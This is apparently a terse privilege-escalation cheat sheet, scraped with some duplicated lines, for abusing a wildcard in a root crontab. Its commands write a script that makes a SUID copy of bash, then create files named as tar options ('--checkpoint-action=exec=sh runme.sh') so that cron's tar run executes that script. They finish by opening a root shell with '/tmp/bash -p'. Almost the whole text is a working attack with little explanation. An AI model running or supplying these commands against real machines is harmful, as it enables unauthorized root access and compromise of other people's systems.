wildcard crontab
cat /etc/crontab 

Last updated
cat /etc/crontab 

Last updated
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
# make script run with s privilege
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ runme.sh
# wait one minute and open bash with root privilege
/tmp/bash -p